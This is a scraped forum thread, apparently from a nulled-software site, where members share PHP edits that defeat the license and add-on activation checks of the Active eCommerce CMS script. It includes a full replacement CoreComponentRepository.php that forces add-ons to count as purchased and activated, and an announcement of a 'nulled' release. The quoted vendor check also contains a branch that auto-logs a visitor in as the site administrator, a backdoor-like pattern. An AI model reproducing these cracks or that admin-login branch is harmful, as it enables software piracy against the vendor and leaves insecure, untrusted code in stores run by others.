Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v9.8.1

No permission to download

waseem2020

New member
Mar 4, 2021
6
1
3
Simply Comment or Delete this code in -> vendor/mehedi-iitdu/core-component-repository/src/CoreComponentRepository.php

$addon->activated = 0;
$addon->save();

flash('Please reinstall '.$addon->name.' using valid purchase code')->warning();
return redirect()->route('index')->send();

Is there anybody facing error in Active Ecommerce Addons verification in v 6.3.2?

 

khgreen

New member
Jul 7, 2022
4
3
3
Nullmaster?
We need to change the code in some file only. and need to find some content as:
- 206.189.81.181
- https://activeitzone.com/activation/check/

It is on version: 6.3.3 that i have been change.

PHP:
if(1==-1){ 
    $url = $_SERVER['SERVER_NAME']; 
    $gate = "http://2x0x6.189.81.181/check_addon_activation/".$url; 
    $stream = curl_init(); 
    curl_setopt($stream, CURLOPT_URL, $gate); 
    curl_setopt($stream, CURLOPT_HEADER, 0); 
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($stream, CURLOPT_POST, 1); 
    $rn = curl_exec($stream); 
    curl_close($stream); 
    dd($rn); 
    if($rn == "bad" && env('DEMO_MODE') != 'On') { 
    $user = User::where('user_type', 'admin')->first(); 
    auth()->login($user); 
    return redirect()->route('admin.dashboard'); 
    } 
}

Note: You can also remove the code. But i like to keep the old code so (1==-1).
Thank you.
 

mptu

New member
Sep 23, 2022
23
1
1
We need to change the code in some file only. and need to find some content as:
- 206.189.81.181
- https://activeitzone.com/activation/check/

It is on version: 6.3.3 that i have been change.

PHP:
if(1==-1){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://2x0x6.189.81.181/check_addon_activation/".$url;
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    dd($rn);
    if($rn == "bad" && env('DEMO_MODE') != 'On') {
    $user = User::where('user_type', 'admin')->first();
    auth()->login($user);
    return redirect()->route('admin.dashboard');
    }
}

Note: You can also remove the code. But i like to keep the old code so (1==-1).
Thank you.

Thank you so much!
 

alfonsobp

Member
Nov 29, 2019
39
15
8
H
We need to change the code in some file only. and need to find some content as:
- 206.189.81.181
- https://activeitzone.com/activation/check/

It is on version: 6.3.3 that i have been change.

PHP:
if(1==-1){
    $url = $_SERVER['SERVER_NAME'];
    $gate = "http://2x0x6.189.81.181/check_addon_activation/".$url;
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $gate);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    dd($rn);
    if($rn == "bad" && env('DEMO_MODE') != 'On') {
    $user = User::where('user_type', 'admin')->first();
    auth()->login($user);
    return redirect()->route('admin.dashboard');
    }
}

Note: You can also remove the code. But i like to keep the old code so (1==-1).
Thank you.
How to change?.. Example please... 😅
 

sakhmart

Well-known member
Null Master
Trusted Uploader
Banned User
May 26, 2022
313
264
70
Pakistan
version : 6.5.0 (28/12/2022)

- Add functionalities for Khalti Payment Gateway
- Add functionalities for SPARROW SMS Gateway
- Add functionalities for Club Point Add-on v1.6
- Add a new option to set currency code for iyzico Payment Gateway
- Important bug fixing

Active Ecommerce 6.5.0 Nulled
 

tuton012

Strive for progress, not perfection
Babiato Lover
Trusted Uploader
May 23, 2019
1,607
2,060
120
Near You
  • Like
Reactions: Doctorwi

dolarbaz

New member
Dec 21, 2022
22
9
3
go to your root folder - public_html/vendor/mehedi-iitdu/core-component-repository/src and edit the file named CoreComponentRepository.php delete all and replace it with the code given below

PHP:
<?php
namespace MehediIitdu\CoreComponentRepository;
use App\Models\Addon;
use Cache;
class CoreComponentRepository
{
public static function instantiateShopRepository() {
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_activation/".$url;
$rn = self::serializeObjectResponse($gate);
self::finalizeRepository($rn);
}
protected static function serializeObjectResponse($zn) {
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $zn);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
return $rn;
}
protected static function finalizeRepository($rn) {
if($rn == "bad" && env('DEMO_MODE') == 'on') {
return redirect('https://activeitzone.com/activation/')->send();
}
}
public static function initializeCache() {
foreach(Addon::all() as $addon){
if ($addon->purchase_code != null) {
}
if(Cache::get($addon->unique_identifier.'-purchased', 'no') != 'no'){
try {
$gate = "https://activeitzone.com/activation/check/".$addon->unique_identifier."/".$addon->purchase_code;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == 'no') {
Cache::rememberForever($addon->unique_identifier.'-purchased', function () {
return 'yes';
});
}
else{
Cache::rememberForever($addon->unique_identifier.'-purchased', function () {
return 'yes';
});
}
} catch (\Exception $e) {
}
}
}
}
public static function finalizeCache($addon){
$addon->activated = 1;
$addon->save();
flash('Please reinstall '.$addon->name.' using valid purchase code')->warning();
return redirect()->route('addons.index')->send();
}
}
thx bro
that worked on 6.5.0 version ;)
 
  • Like
Reactions: oneten and Jekadog

127

New member
May 17, 2022
3
0
1
Hi everyone, does anyone have an untouched Active E-commerce CMS v6.5.0? Because when I tried to install the script on my local server using XAMPP it's gives me a 500 error when I try to install the database through the setup or even when I manually import the SQL database. Or does the script work on a live server only?
 

127

New member
May 17, 2022
3
0
1
Hi everyone, does anyone have an untouched Active E-commerce CMS v6.5.0? Because when I tried to install the script on my local server using XAMPP it's gives me a 500 error when I try to install the database through the setup or even when I manually import the SQL database. Or does the script work on a live server only?
Its cool I just went through the threads to previous posts I'll try some of the fix's there.
 

Forum statistics

Threads
69,206
Messages
908,351
Members
236,895
Latest member
jeremcastdlp

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu